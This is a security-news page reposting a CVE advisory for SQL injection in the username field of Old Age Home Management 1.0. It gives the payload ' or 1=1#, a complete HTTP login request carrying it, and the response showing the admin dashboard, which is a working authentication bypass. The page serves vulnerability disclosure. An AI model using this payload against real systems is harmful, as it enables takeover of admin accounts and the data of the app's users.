Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

CVE
Open in Source
#sql#web#windows#apple#apache#php#chrome#webkit#ssl

The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty’ or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it.

POST /oahms/admin/login.php HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg Content-Length: 62 Cache-Control: max-age=0 Sec-Ch-Ua: "Not:A-Brand";v="99", “Chromium";v="112” Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: “Windows” Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/oahms/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

HTTP/1.1 200 OK Date: Sat, 29 Apr 2023 05:32:07 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Content-Security-Policy: upgrade-insecure-requests; X-Powered-By: PHP/8.2.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13518

<!DOCTYPE html> <html lang="en">

<head>

<title>Old Age Home Management System|| Dashboard</title> <!-- base:css --> <link rel="stylesheet" href="vendors/typicons/typicons.css"> <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css"> <link rel="stylesheet" href="css/vertical-layout-light/style.css"> <!-- endinject -->

</head>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE